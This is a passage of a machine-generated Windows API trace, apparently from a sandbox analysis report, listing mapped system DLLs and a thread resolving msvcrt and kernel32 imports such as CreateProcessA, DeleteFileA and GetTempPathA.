0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5804 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 5805 start_va = 0x7fefdce0000 end_va = 0x7fefdd15fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5806 start_va = 0x7fefddd0000 end_va = 0x7fefdde9fff entry_point = 0x7fefddd0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5807 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5808 start_va = 0x7fef7de0000 end_va = 0x7fef7dfafff entry_point = 0x7fef7de0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 5809 start_va = 0x7fefcf50000 end_va = 0x7fefcf61fff entry_point = 0x7fefcf50000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Thread: id = 365 os_tid = 0x97c [0241.085] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.085] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.103] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="msvcrt.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x7feff5a0000) returned 0x0 [0241.103] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.103] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.105] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__C_specific_handler", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77c5850c) returned 0x0 [0241.105] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.105] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.107] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_XcptFilter", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff5e0d98) returned 0x0 [0241.107] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.107] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.109] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_exit", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5ec234) returned 0x0 [0241.109] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.109] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.112] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_cexit", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5b4640) returned 0x0 [0241.112] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.112] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.114] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="exit", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a99f4) returned 0x0 [0241.114] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.114] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.116] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_wcmdln", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff6310a8) returned 0x0 [0241.116] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.116] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.118] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_initterm", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x7feff5a44f0) returned 0x0 [0241.118] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.118] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.121] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_amsg_exit", Ordinal=0x0, ProcedureAddress=0x2001b | out: ProcedureAddress=0x2001b*=0x7feff5ec260) returned 0x0 [0241.121] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.121] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.123] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_localtime64", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7feff5a5ee0) returned 0x0 [0241.123] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.123] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.125] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_time64", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a3b18) returned 0x0 [0241.125] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.125] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.127] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??2@YAPEAX_K@Z", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5a3310) returned 0x0 [0241.127] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.127] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.130] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__setusermatherr", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7feff60da94) returned 0x0 [0241.130] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.130] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.132] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_commode", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x7feff631280) returned 0x0 [0241.132] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.132] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.134] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_fmode", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff63127c) returned 0x0 [0241.134] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.134] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.136] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__set_app_type", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5ab088) returned 0x0 [0241.136] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.136] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.139] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="?terminate@@YAXXZ", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x7feff5caa70) returned 0x0 [0241.139] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.139] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.163] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="sprintf", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5f93f4) returned 0x0 [0241.163] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.163] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.173] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="sscanf", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5f9d2c) returned 0x0 [0241.173] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.173] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.176] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="free", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a10a8) returned 0x0 [0241.176] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.176] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.178] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="malloc", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a12dc) returned 0x0 [0241.178] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.178] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.180] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="strtok", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5b4210) returned 0x0 [0241.180] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.180] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.182] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="realloc", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a4860) returned 0x0 [0241.182] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.182] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.185] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_CxxThrowException", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7feff5cab00) returned 0x0 [0241.185] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.185] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.187] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??1type_info@@UEAA@XZ", Ordinal=0x0, ProcedureAddress=0x20026 | out: ProcedureAddress=0x20026*=0x7feff5d2ef8) returned 0x0 [0241.187] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.187] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.189] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="__wgetmainargs", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5b2f18) returned 0x0 [0241.189] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.189] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.191] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_vsnprintf", Ordinal=0x0, ProcedureAddress=0x2001b | out: ProcedureAddress=0x2001b*=0x7feff5a2324) returned 0x0 [0241.191] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.191] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.193] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="atoi", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a1a00) returned 0x0 [0241.193] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.194] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.196] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="strstr", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1794) returned 0x0 [0241.196] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.196] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.198] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_wtoi", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a36b0) returned 0x0 [0241.198] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.198] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.200] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="rand", Ordinal=0x0, ProcedureAddress=0x20015 | out: ProcedureAddress=0x20015*=0x7feff5a1c60) returned 0x0 [0241.200] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.200] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.202] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="tolower", Ordinal=0x0, ProcedureAddress=0x20018 | out: ProcedureAddress=0x20018*=0x7feff5a43c4) returned 0x0 [0241.202] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.202] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.205] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1270) returned 0x0 [0241.205] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.205] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.207] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="srand", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a4620) returned 0x0 [0241.207] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.207] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.209] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_itow", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x7feff5a4cd4) returned 0x0 [0241.209] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.209] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.211] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="_vsnwprintf", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7feff5a2f5c) returned 0x0 [0241.211] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.211] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.213] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??3@YAXPEAX@Z", Ordinal=0x0, ProcedureAddress=0x2001e | out: ProcedureAddress=0x2001e*=0x7feff5a19f0) returned 0x0 [0241.213] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.213] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.216] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memset", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a1000) returned 0x0 [0241.216] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.216] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.218] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="wcsftime", Ordinal=0x0, ProcedureAddress=0x20019 | out: ProcedureAddress=0x20019*=0x7feff60b8c4) returned 0x0 [0241.218] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.218] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.220] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="??_V@YAXPEAX@Z", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7feff5a431c) returned 0x0 [0241.220] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.220] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.223] LdrGetProcedureAddress (in: BaseAddress=0x7feff5a0000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x20017 | out: ProcedureAddress=0x20017*=0x7feff5a10e0) returned 0x0 [0241.223] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.223] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.225] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x20029 | out: BaseAddress=0x20029*=0x77b20000) returned 0x0 [0241.225] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.225] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.227] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="SystemTimeToFileTime", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x77b43560) returned 0x0 [0241.227] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.227] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.229] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemTimeAsFileTime", Ordinal=0x0, ProcedureAddress=0x20028 | out: ProcedureAddress=0x20028*=0x77b33f40) returned 0x0 [0241.229] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.229] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.231] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b35a50) returned 0x0 [0241.231] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.231] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.234] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x77b33ee0) returned 0x0 [0241.234] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.234] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.236] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetTickCount", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b42b00) returned 0x0 [0241.236] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.236] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.238] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="QueryPerformanceCounter", Ordinal=0x0, ProcedureAddress=0x20028 | out: ProcedureAddress=0x20028*=0x77b36500) returned 0x0 [0241.238] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.238] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.240] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77b347a0) returned 0x0 [0241.240] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.240] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.242] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b6bca0) returned 0x0 [0241.242] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.242] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.245] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x77b35cf0) returned 0x0 [0241.245] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.245] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.247] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b43730) returned 0x0 [0241.247] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.247] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.249] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x20029 | out: ProcedureAddress=0x20029*=0x77bb9330) returned 0x0 [0241.249] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.249] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.251] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlVirtualUnwind", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x77b6b5b0) returned 0x0 [0241.251] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.251] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.253] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlLookupFunctionEntry", Ordinal=0x0, ProcedureAddress=0x20027 | out: ProcedureAddress=0x20027*=0x77b6b610) returned 0x0 [0241.254] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.254] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.256] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="RtlCaptureContext", Ordinal=0x0, ProcedureAddress=0x20022 | out: ProcedureAddress=0x20022*=0x77b6b6f0) returned 0x0 [0241.256] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.256] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.258] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x2002c | out: ProcedureAddress=0x2002c*=0x77b39b70) returned 0x0 [0241.258] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.258] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.260] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetStartupInfoW", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x77b38070) returned 0x0 [0241.260] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.260] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.262] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b42f80) returned 0x0 [0241.262] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.262] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.265] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="WriteFile", Ordinal=0x0, ProcedureAddress=0x2001a | out: ProcedureAddress=0x2001a*=0x77b435a0) returned 0x0 [0241.265] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.265] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.267] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateFileA", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b431f0) returned 0x0 [0241.267] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.267] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.269] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="WaitForSingleObject", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b42b20) returned 0x0 [0241.269] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.269] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.271] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="CreateProcessA", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77bb8840) returned 0x0 [0241.271] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.272] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.274] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x77b314e0) returned 0x0 [0241.274] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.274] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.276] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b82060) returned 0x0 [0241.276] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.276] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.278] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x77b37700) returned 0x0 [0241.278] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.278] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.281] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetSystemDirectoryW", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x77b37120) returned 0x0 [0241.281] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.281] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.283] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0x20016 | out: ProcedureAddress=0x20016*=0x77b42b70) returned 0x0 [0241.283] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.283] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.285] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x77b43690) returned 0x0 [0241.285] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.285] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.287] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="LoadLibraryW", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x77b36f80) returned 0x0 [0241.287] NtClearEvent (EventHandle=0x8) returned 0x0 [0241.287] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0241.289] LdrGetProcedureAddress (in: BaseAddress=0x77b20000, Name="GetLastError", Ordinal=0x0, ProcedureAddress=0x2001d | out: 